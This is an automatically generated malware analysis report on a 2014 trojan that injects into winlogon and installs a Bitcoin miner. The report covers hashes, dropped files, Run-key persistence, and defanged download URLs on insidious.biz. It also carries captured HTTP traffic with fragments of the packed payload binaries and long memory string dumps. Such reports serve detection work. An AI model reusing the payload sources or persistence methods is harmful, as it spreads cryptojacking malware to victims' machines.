Trojan.GenericKD.1586901_222c557143

by malwarelabrobot on April 7th, 2014 in Malware Descriptions.

Trojan.MSIL.Miner.vt (Kaspersky), Trojan.DownLoader9.4905 (DrWeb), Artemis!222C557143EE (McAfee), Worm.Win32.Gamarue (Ikarus), MSIL:Injector-FY [Trj] (Avast), Trojan.GenericKD.1586901 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Worm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 222c557143ee4f9186c2c62963a23c59
SHA1: d4dc2d4e82c4aaed0b9543180c885babf67ce2e3
SHA256: 4364d1f8a8449c306a11980c81f207a07a41f0dcd0bb0dbb05dfcb2010eca9c7
SSDeep: 1536:XL2DjOKLJb6ePVKBECJrtYlLcQJpmmEcMdpncJxb3o2NbMALI7:SfZJb6GVKBEg84ukmEVdpnYvMV
Size: 74752 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-12 05:00:29
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3948

The Trojan injects its code into the following process(es):

bdllsysinc:528
winlogon.exe:2224

File activity

The process bdllsysinc:528 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\zTIcT\phatk.cl (606 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\winlogon.exe (196 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\miner.dll (4899 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\usft_ext.dll (15324 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\mpir.dll (8280 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\taskengine.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\coinutil.dll (1924 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\openssl.dll (10156 bytes)

The process %original file name%.exe:3948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\bdllsysinc (601 bytes)

Registry activity

The process bdllsysinc:528 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 F8 15 B8 69 A5 11 DF 5D F0 1B F9 29 10 39 B7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sysetyo" = "%Documents and Settings%\%current user%\Application Data\Microsoft\bdllsysinc"

"Default" = "%Documents and Settings%\%current user%\Application Data\zTIcT\taskengine.exe"

The process %original file name%.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 26 D9 EE F1 D3 6E 12 DA 99 44 40 12 CE A3 20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

Dropped PE files

MD5 File path
fb2e702245641352e5080376c8b4c0ec c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\coinutil.dll
781ab510902b049273e8a7937717717a c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\miner.dll
c5ef047da98c6cc681e0a73b23fbdc5e c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\mpir.dll
a3e8313b8422c91a183c569df6723adb c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\openssl.dll
16f5ad602489e3a2ebbd843f844a3f3c c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\usft_ext.dll
d44ec356816b57d7377ddd4153d08856 c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\winlogon.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: 9ee731a4
Product Name: 1f72938e
Product Version: 1.0.0.0
Legal Copyright: Copyright (C) 7c7c 2014
Legal Trademarks: d526e0f8
Original Filename: 354ef49cc7.exe
Internal Name: 354ef49cc7.exe
File Version: 1.0.0.0
File Description: 13db888a
Comments: 5172a068
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 71508 71680 5.18618 848ecdab1f0f02a06dc5f6c7fae8ec25
.rsrc 81920 1540 2048 2.78979 5349167494a9e6cff5d6bd8a957d7c4f
.reloc 90112 12 512 0.070639 d73f3314ca980f9db40ab0b4e44c570f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://insidious.biz/btcfiles/program.exe 108.162.199.53
hxxp://insidious.biz/btcfiles/miner.dll
hxxp://insidious.biz/btcfiles/phatk.cl
hxxp://insidious.biz/btcfiles/openssl.dll
hxxp://insidious.biz/btcfiles/usft_ext.dll
hxxp://insidious.biz/btcfiles/coinutil.dll
hxxp://insidious.biz/btcfiles/mpir.dll
stratum.bitcoin.cz 95.211.52.40


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /btcfiles/program.exe HTTP/1.1
Host: insidious.biz
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:44 GMT
Content-Type: application/octet-stream
Content-Length: 17408
Connection: keep-alive
Set-Cookie: __cfduid=dd591da01a3b50236048c3b33653c77111396750544346; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:12:25 GMT
ETag: "2ee7c2d-4400-4ebddbfcc9c40"
Accept-Ranges: bytes
CF-RAY: 116a7ab624e002b8-IAD
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$............w.^.w.^
.w.^..E^.w.^)h.^.w.^Bk.^.w.^)h.^.w.^)h.^.w.^.&o^.w.^.&S^.w.^.w.^dw.^.&
o^.w.^.&R^.w.^.&U^.w.^.&P^.w.^Rich.w.^........................PE..L...
~._R..........#......@........... .......0....@.......................
[email protected]...............
......................................................................
..............................UPX0....................................
UPX1.....@.......>[email protected].....
.........@............................................................
......................................................................
......................................................................
......................................................................
......................................................................
..........3.08.UPX!.....4....4{.....;[email protected]*..d...P
d.%........SVW.e...u.....E..E.....M.....x.)u..M..U....E..aM....d[.....
.._^[...2}.u.l.4..u.....O|..a....QQ..e..^i.... M.......Y......F...D$..
..8csm.t.3[......4.6.=P...t<...... ...hL&h1*...v...<....E......Y
.H....!3..  * [email protected]...([email protected]..^.<[email protected]..
{.:..P3L.....vw.u`.8.E...P.54.}..m..P...PpXh..]..e.(0.M...th.u......0.
WT...h,?E......PQ...v;HY.V..$.t..&...;~.._..gj..P...-.`...g...h.....fK
o.....D~~.HE. .....AY.,(...u...xV.. W..F.}...wE....h.$V4.b.O..`...
<<< skipped >>>

GET /btcfiles/miner.dll HTTP/1.1


Host: insidious.biz


HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:44 GMT
Content-Type: application/octet-stream
Content-Length: 99328
Connection: keep-alive
Set-Cookie: __cfduid=dceed3a4b70781cb0e007282b598a85e71396750544642; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:12:13 GMT
ETag: "2ee7c29-18400-4ebddbf158140"
Accept-Ranges: bytes
CF-RAY: 116a7ab8051e02b8-IAD
MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$.......z..,>~..&
gt;~..>~..7.i.6~..7.y.?~...a..<~...b..=~...a..=~...a..;~..e/'.;~
..>~......|/..=~..e/..*~..e/%.<~..e/&.?~..e/!.?~..e/$.?~..Rich&g
t;~..........................PE..L...=._R.........."!.................
.... .................................................................
......................................................................
...........................................`][email protected]
0....................................UPX1......... ...r...............
[email protected]..............@..........................
......................................................................
......................................................................
......................................................................
......................................................................
............................3.08.UPX!.....4...Y)[email protected].
T....8.EF...I3..k-.l.9x..kW.?M..l.......m..V([email protected]..
...w9.'U........o..k...tu.o....E&H.Vr&..*.C.Q.................r.h.q..T
A2@.!..c.....|...6U......N. .<."...1...k.g.<!.S...2.c...O}......
.H...J.=D.K..DJ]!NW.~F..H.P..A.e..d.~.. ..... 1..jI%..U././.i...<p.
.$.<...........C.......D......Y!Y.*.i.b..F ..2.}.k...^.......Y;...k
,b>;. h...5...-...^...Y^JO.qY.k._.',..%;...P... ..%..'..}L.[.w..U.[
x.1.O...M.......,.9..'...u..q..o.....Ga#c.jP8.....0......in.~.fy..
<<< skipped >>>

GET /btcfiles/phatk.cl HTTP/1.1


Host: insidious.biz


HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:45 GMT
Content-Type: application/simple-filter xml
Content-Length: 9385
Connection: keep-alive
Set-Cookie: __cfduid=d80112b72dd11264105364a42ed2d424f1396750545071; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Fri, 13 Sep 2013 12:11:02 GMT
ETag: "2ee7c2c-24a9-4e642bf816180"
Accept-Ranges: bytes
CF-RAY: 116a7abab56d02b8-IAD
// This file is taken and modified from the public-domain poclbm proje
ct, and.// we have therefore decided to keep it public-domain in Phoen
ix...// 2011-07-11: further modified by Diapolo and still public-domai
n..#ifdef __CUDACC__..typedef unsigned int uint;..typedef unsigned lon
g ulong;.#.define __constant __constant__.#.define __kernel __global__
.#.define __global.#.define rotate(x, y)  ((x << y) | (x >>
; (32-y))).#.define get_global_id(y)  (threadIdx.x blockDim.x*blockIdx
.x).#.define bitselect(z, y, x) ((x & y) ^ (~x & z)).#endif...#define 
OUTPUT_SIZE 256.#define OUTPUT_MASK 255...#ifdef VECTORS..typedef uint
2 u;.#else..typedef uint u;.#endif..__constant uint K[64] = { .    0x4
28a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0
x923f82a4, 0xab1c5ed5,.    0xd807aa98, 0x12835b01, 0x243185be, 0x550c7
dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,.    0xe49b69c1, 0
xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc,
 0x76f988da,.    0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e
00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,.    0x27b70a85, 0x2e1b2138,
 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c8
5,.    0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd
6990624, 0xf40e3585, 0x106aa070,.    0x19a4c116, 0x1e376c08, 0x2748774
c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,.    0x7
48f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0
xbef9a3f7, 0xc67178f2.};..// H[6] =  0x08909ae5U   0xb0edbdd0   K[
<<< skipped >>>

GET /btcfiles/openssl.dll HTTP/1.1


Host: insidious.biz


HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:45 GMT
Content-Type: application/octet-stream
Content-Length: 331264
Connection: keep-alive
Set-Cookie: __cfduid=d357c820b8f0775506d81f4bd6f36286e1396750545294; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:17:52 GMT
ETag: "2ee7c2b-50e00-4ebddd34a3c00"
Accept-Ranges: bytes
CF-RAY: 116a7abc15ab02b8-IAD
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.............y...y.
..y.......y.......y.2.}...y.2.r...y.Y.w...y.2.s...y.......y...x.e.y...
....y.....7.y.......y.......y.......y.......y.Rich..y.................
PE..L....._R.........."!......... ......`............. ...............
......................................................................
......................................................................
......................................UPX0............................
[email protected]..... ............
..............@.......................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!......'..C6r....\....,..I".....(.<.....n."....7..\.
\}<..w#.`..Y.z.1.y..pK0.'.t^,....l....L..E......8....DZ..H....W.@y.
uw....Q.[=r\...cp.)..Bf.{jD..{..d=....(..N...L..O..G.*..>rj3..G.d..
v...^..:.,P/.T..<n.gB.......[......4...Ac.[E...'.......%.....s ....
.....m.8.:.".mO..I.....W...!.;..L.j..c[..|.r.&....C....y...}.uG.C};..!
.36....U...o%.......,...F.X........l...>..0g...]$...6.N.../@...Z.8.
..`.2.<.'V...jg2.. .....E .((.K.- .....O.<.1 .S..I......3.j...`.
C.[.ta.#Rlj.x4..L.n...B.T. ..bW,...MN.}e5.b...WgV.n.b..D..`TSsS7..
<<< skipped >>>

GET /btcfiles/usft_ext.dll HTTP/1.1


Host: insidious.biz


HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:46 GMT
Content-Type: application/octet-stream
Content-Length: 259584
Connection: keep-alive
Set-Cookie: __cfduid=ddbebe7dc3dbad8da7b12cb303b99276e1396750546483; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:13:47 GMT
ETag: "2ee7c2e-3f600-4ebddc4afd4c0"
Accept-Ranges: bytes
CF-RAY: 116a7ac386cc02b8-IAD
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......CF...'a..'a.
.'a. ....'a.._...'a.._...'a..'`..%a..8e..'a..8k..'a..;o..'a.Ev...'a.\v
..%'a.\v..Q'a.\v...'a.\v...'a.\v...'a.\v...'a.Rich.'a.................
PE..L....._R.........."!.................Q.......`....................
...................................................q...^..Dp.......`..
D....................................................]................
[email protected]............................
[email protected]........`...r....
..............@.......................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!....e...[T..;=...q...^..I".....A......./z&.rR.G.-..cX.
=......R..%I_.v.F.l..N*.W[./_.4.L.[..ZI...7...x..,.....s.>.%.'5$...
_`4...Tg.}.......!...._.i..Y.#....`.e....K<.......a...`.l.Z....."..
>.&........B......$...o_p...o.IT...gTo.......{!...YN.....Ov!.l..V".
h..p....b.q..<&..R`....Z...8......j9z.j.,.....L......S.O....B.....-
.qp..!.??H..I.(\..I?........l=...n..{~.oL.\y,qo.>.}.$.g........P...
V2#'...(.Q.C..$i..l..@..].:..`?..Rd....v......\O...:.i.&.k..f.q=..8R..
.....h..T..lu...zqz....Y..........$....L.-...l.b......R...H.......
<<< skipped >>>

GET /btcfiles/coinutil.dll HTTP/1.1


Host: insidious.biz


HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:47 GMT
Content-Type: application/octet-stream
Content-Length: 22528
Connection: keep-alive
Set-Cookie: __cfduid=d4f436998a56931dccfba7226c19f08481396750547153; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:11:26 GMT
ETag: "2ee7c27-5800-4ebddbc485780"
Accept-Ranges: bytes
CF-RAY: 116a7ac7b76102b8-IAD
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$............g...g..
.g...6U..g....'..g..ux...g...{...g..ux...g..ux...g...6i..g...g.. g...6
U..g...6k..g...6h..g...6o..g...6j..g..Rich.g..........................
PE..L...#._R.........."!.....P..........PI.......P....................
...........`.......................................Q......XP..d....P..
X...................PV................................................
......................................UPX0............................
........UPX1.....P.......L..................@....rsrc........P.......P
..............@.......................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!.....)..F:.Bc*..PI......&.......U..j.h..o..P"d...d.%..
._...SVW3..E.....;vk..E.}..u....U..u....*...F ....eM.....f.M..._^.i..[
...2}..u..u.....r...O..........e..........E...i.....M.x.).M.U.........
.... .....o..QQ..e.... M....f.....\Y..F.7.....D$....8csm.t.......ln...
=...t<......l`x...|..*..P.........E.r....Y.H.V..;......D$..t.V..Y:^
..S..7.......L$...3.....w.......P...\2T ..............u...6.dz.....r.;
...}Hw..Pv...."..............[....v....9.zp~..........``......!xu?h.2.
.a..d^Y..u.(.f. .....u.h..D.9|....o...YY.=.9M.t0.....BV.q.;.r.....
<<< skipped >>>

GET /btcfiles/mpir.dll HTTP/1.1


Host: insidious.biz


HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:47 GMT
Content-Type: application/octet-stream
Content-Length: 69120
Connection: keep-alive
Set-Cookie: __cfduid=d2539de5cabbcd945efbcb56180ccb9201396750547396; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:18:27 GMT
ETag: "2ee7c2a-10e00-4ebddd5604ac0"
Accept-Ranges: bytes
CF-RAY: 116a7ac937ab02b8-IAD
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.............s...s.
..s.......s.......s.z.w...s...}...s.z.x...s.z.y...s.......s...r...s...
s...s.......s..... .s.......s.......s.......s.Rich..s.................
PE..L... ._R.........."!.............`...i...p........................
......................................................................
......................................................................
......................................UPX0.....`......................
[email protected]..................
..............@.......................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!.......qf.5`AD..........I..P... .............@.....|V.
..YpM........`.....w.S....i..X....{..N...O.QR.....~..(}n.#....<Yl.}
y....uu...^.c.'..7.oq..{....Cw...9v...g...##.d..}....\.:.0.....z.....*
$./..#....N:%..o..W"..._.._.... ........@...^...N/..............W?.L.Q
....0.....9.1....`.]..VJ........!v..}.*Zj..O:....R.r..)..-.....s>..
.......O5..!.R.K.].....h^[B.......W_6...._...d:.d..-.u=^...G3..y.....@
......h...t.0....#M...f../\Q..bv....v..j.t....up.X.......a9.I._..7!.!.
......K.......z...6...zy..4c.......p.KK.v^...=..\....%........a...
<<< skipped >>>
winlogon.exe_2224:

{?.OV
http://ufasoft.com/coin
http://127.0.0.1:8332
-x type=host:port Use HTTP or SOCKS proxy. Examples: -x http=127.0.0.1:3128, -x socks=127.0.0.1:1080
{-options}
-A user-agent Set custom User-agent string in HTTP header, default: Ufasoft bitcoin miner
-o url in form http://user:[email protected]:port/path, stratum tcp://server.tld:port, by default http://127.0.0.1:8332
C:\OUT\FINAL_OUT\Release\PDB\coin-miner.pdb
coin-miner.exe
?SetLogin@BitcoinMiner@Coin@@UAEXPBD@Z
?SetMainUrl@BitcoinMiner@Coin@@UAEXPBD@Z
?SetPassword@BitcoinMiner@Coin@@UAEXPBD@Z
?SubmitResult@BitcoinMiner@Coin@@UAE_NAAPAVWebClient@Ext@@ABVBitcoinWorkData@2@@Z
?GetWork@BitcoinMiner@Coin@@UAE?AV?$ptr@VBitcoinWorkData@Coin@@VInterlocked@Ext@@@Ext@@AAPAVWebClient@4@@Z
?GetWebClient@BitcoinMiner@Coin@@UAE?AVBitcoinWebClient@2@PAVWorkerThreadBase@2@@Z
.text
`.rdata
@.data
.rsrc
x type=host:portU@HTTP
o urld
C:\OUT\FINAL_
H.TP'2
$IPBDMMa&Url
WebCli;A
$M n.rd
KERNEL32.DLL
miner.dll
MSVCRT.dll
usft_ext.dll

winlogon.exe_2224_rwx_00401000_00011000:

http://ufasoft.com/coin
http://127.0.0.1:8332
-x type=host:port Use HTTP or SOCKS proxy. Examples: -x http=127.0.0.1:3128, -x socks=127.0.0.1:1080
{-options}
-A user-agent Set custom User-agent string in HTTP header, default: Ufasoft bitcoin miner
-o url in form http://user:[email protected]:port/path, stratum tcp://server.tld:port, by default http://127.0.0.1:8332
C:\OUT\FINAL_OUT\Release\PDB\coin-miner.pdb
coin-miner.exe
?SetLogin@BitcoinMiner@Coin@@UAEXPBD@Z
?SetMainUrl@BitcoinMiner@Coin@@UAEXPBD@Z
?SetPassword@BitcoinMiner@Coin@@UAEXPBD@Z
?SubmitResult@BitcoinMiner@Coin@@UAE_NAAPAVWebClient@Ext@@ABVBitcoinWorkData@2@@Z
?GetWork@BitcoinMiner@Coin@@UAE?AV?$ptr@VBitcoinWorkData@Coin@@VInterlocked@Ext@@@Ext@@AAPAVWebClient@4@@Z
?GetWebClient@BitcoinMiner@Coin@@UAE?AVBitcoinWebClient@2@PAVWorkerThreadBase@2@@Z
.text
`.rdata
@.data
.rsrc
x type=host:portU@HTTP
o urld

winlogon.exe_2224_rwx_11001000_000C5000:

t.Ht&Ht
9whv%S
.dmp.gz
http://ufasoft.com/cgi-bin/crashdump.cgi
CrashDump Report
BUG Report
[email protected]
SMTP:
Do you want to send bug report wih Crash Memory Dump to development team?
InitOnceExecuteOnce
%Y-%m-%d %H:%M:%SZ
%3s %d %d
%4x d:d:d.d
ole32.dll
%%%s.%sI64%c
%%I64%c
^\\\\\?\\([A-Za-z]:.*)
KERNEL32.DLL
kernel32.dll
Windows 9x
Windows NT
Windows CE
Windows Native NT
!'()*-._
([^=] )=(.*)
/.cache
TCMALLOC_LARGE_ALLOC_REPORT_THRESHOLD
R:\foreign\tcmalloc\tcmalloc.cc
class = [ %8Iu bytes ] : %8I64u objs; %5.1f MiB; %5.1f cum MiB
PageHeap: %d sizes; %6.1f MiB free; %6.1f MiB unmapped
%6u pages * %6u spans ~ %6.1f MiB; %6.1f MiB cum; unmapped: %6.1f MiB; %6.1f MiB cum
>255 large * %6u spans ~ %6.1f MiB; %6.1f MiB cum; unmapped: %6.1f MiB; %6.1f MiB cum
generic.current_allocated_bytes
generic.heap_size
tcmalloc.slack_bytes
tcmalloc.central_cache_free_bytes
tcmalloc.transfer_cache_free_bytes
tcmalloc.thread_cache_free_bytes
tcmalloc.pageheap_free_bytes
tcmalloc.pageheap_unmapped_bytes
tcmalloc.max_total_thread_cache_bytes
tcmalloc.current_total_thread_cache_bytes
tcmalloc.central
tcmalloc.transfer
tcmalloc.thread
tcmalloc.page
tcmalloc.page_unmapped
tcmalloc.large
tcmalloc.large_unmapped
This malloc implementation does not support sampling.
As of 2005/01/26, only tcmalloc supports sampling, and
heap_v2/%d
This malloc implementation does not support ReadHeapGrowthStackTraces().
As of 2005/09/27, only tcmalloc supports this, and you
R:\foreign\tcmalloc\central_freelist.cc
 constructing: %s
 destroying: %s
R:\foreign\tcmalloc\common.cc
R:\foreign\tcmalloc\stack_trace_table.cc
I64x-I64x %c%c%c%c I64x x:x %-11I64d %s
r:\foreign\tcmalloc\page_heap_allocator.h
%%.%d%c
%d.%d.%d.%d
https
http://host/q?
RICHED20.DLL
^\{.rtf
CCmdTarget
psapi.dll
http://ufasoft.com/
http://ufasoft.com/forum//
ufasoft.com
http://
http://ufasoft.com/cgi-bin/notify.cgi
RegUrl0
1.2.7
NTDLL.DLL
%s: illegal option -- %c
%s: option requires an argument -- %c
%s: option `%s' is ambiguous
%s: option `--%s' doesn't allow an argument
%s: option `%c%s' doesn't allow an argument
%s: option `%s' requires an argument
%s: unrecognized option `--%s'
%s: unrecognized option `%c%s'
%s: invalid option -- %c
%s: option `-W %s' is ambiguous
%s: option `-W %s' doesn't allow an argument
http=
(socks|http)=([^:] ):(\d )
*.lng
mapi32.dll
COMCTL32.DLL
Afx:%p:%x
Afx:%p:%x:%p:%p:%p
WININET.dll
PSAPI.DLL
ADVAPI32.dll
VERSION.dll
WS2_32.dll
SHELL32.dll
COMCTL32.dll
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
Error text not found (please report)
%s near '%s'
%s near end of file
unable to decode byte 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
duplicate object key
unable to open %s: %s
\ux
\ux\ux
deflate 1.2.7 Copyright 1995-2012 Jean-loup Gailly and Mark Adler
inflate 1.2.7 Copyright 1995-2012 Mark Adler
dbghelp.dll
C:\OUT\FINAL_OUT\Release\PDB\usft_ext.pdb
InternetCrackUrlW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoW
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegFlushKey
RegOpenKeyExW
RegQueryInfoKeyW
ShellExecuteW
.?AVRegexExc@Ext@@
.?AVWebExc@Ext@@
GetWindowsDirectoryW
GetProcessHeap
CreateNamedPipeW
ConnectNamedPipe
CreatePipe
GetConsoleOutputCP
GetViewportExtEx
SetViewportOrgEx
SetViewportExtEx
_pipe
GetKeyState
MsgWaitForMultipleObjects
EnumWindows
UnhookWindowsHookEx
SetWindowsHookExW
4#%d#
BBXEXEE
$$ (($(( $$
.text
`.rdata
@.data
.rsrc
@.reloc
DbgHelp.dll
urlmon.dll
wininet.dll
ntdll.dll
0NTDLL.dll
789:;<=>?
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Linked %s
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
6The file is not supported by a Document Object server.A%1
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol family
WS2_32.DLL version out of range
HTTP error code
VarType not supported
Invalid type for this operation
Unsupported variant type
Name of application key is empty
Encoding not supported
New Unsupported Protocol Verion used
Cannot insert Duplicate Key into Database
Invalid Version Number (only V4 & V5 are supported)
Request rejected because the client program and identd report different user-ids
Server's authentication method does not supported by client
Bad SOCKS Username or Password
SOCKS Method not supported
Invalid HTTP request
SOCKS command not supported
AddressTypeNotSupported

winlogon.exe_2224_rwx_13001000_00025000:

GNU MP assertion failed: %s
GNU MP: Cannot allocate memory (size=%u)
GNU MP: Cannot reallocate memory (old_size=%u new_size=%u)
$%&'()* ,-./0123456789:;<=
DFwV.zu
C:\OUT\FINAL_OUT\Release\PDB\mpir.pdb
MPIR.dll
.text
`.rdata
@.data
.rsrc
@.reloc

winlogon.exe_2224_rwx_13201000_000CC000:

Montgomery Multiplication for x86, CRYPTOGAMS by 
j.XPhXj(
t.PSS
t.HHt
FtPWW
FtPRV
FtPR
Ht.Hu=
Ht^Ht.Ht
%UUUU
%UUUU3
SSShT
@w;t5Ht.Ht&HHt
t.Ht$Ht
hexkey
x509_pkey
evp_pkey
ssl_cert
ssl_sess_cert
%s(%d): OpenSSL internal error, assertion failed: %s
OpenSSL 1.0.0c 2 Dec 2010
built on: %s
compiler: %s
Windows
platform: %s
Dynamic engine loading support
ENGINE_cmd_is_executable
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd_string
ENGINE_get_pkey_asn1_meth
ENGINE_get_pkey_meth
ENGINE_load_private_key
ENGINE_load_public_key
ENGINE_load_ssl_client_cert
ENGINE_UNLOAD_KEY
cmd not executable
failed loading private key
failed loading public key
invalid cmd name
invalid cmd number
unimplemented public key method
crypto\engine\eng_pkey.c
x509 certificate routines
DSO support routines
passed a null parameter
error:lX:%s:%s:%s
%lu:%s:%s:%d:%s
Stack part of OpenSSL 1.0.0c 2 Dec 2010
lhash part of OpenSSL 1.0.0c 2 Dec 2010
x -
x%c
%sx - 
BIO_get_port
broken pipe
no accept port specified
no port defined
no port specified
unsupported method
RAND part of OpenSSL 1.0.0c 2 Dec 2010
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
ADVAPI32.DLL
KERNEL32.DLL
NETAPI32.DLL
USER32.DLL
ddddddZ
'() ,-./:=?
\X
ddddddZ
d2i_AutoPrivateKey
d2i_PrivateKey
d2i_PublicKey
d2i_X509_PKEY
i2d_DSA_PUBKEY
i2d_EC_PUBKEY
i2d_PrivateKey
i2d_PublicKey
i2d_RSA_PUBKEY
X509_PKEY_new
bad password read
digest and key type not supported
private key header missing
streaming not supported
unable to decode rsa key
unable to decode rsa private key
unknown public key type
unsupported any defined by type
unsupported cipher
unsupported encryption algorithm
unsupported public key type
unsupported type
wrong public key type
ASN.1 part of OpenSSL 1.0.0c 2 Dec 2010
priv [ %d ]
cont [ %d ]
appl [ %d ]
certs
NETSCAPE_CERT_SEQUENCE
keyfunc
keylength
pkeyalg
pkey
PKCS8_PRIV_KEY_INFO
%s %s%lu (%s0x%lx)
x%s
Certificate:
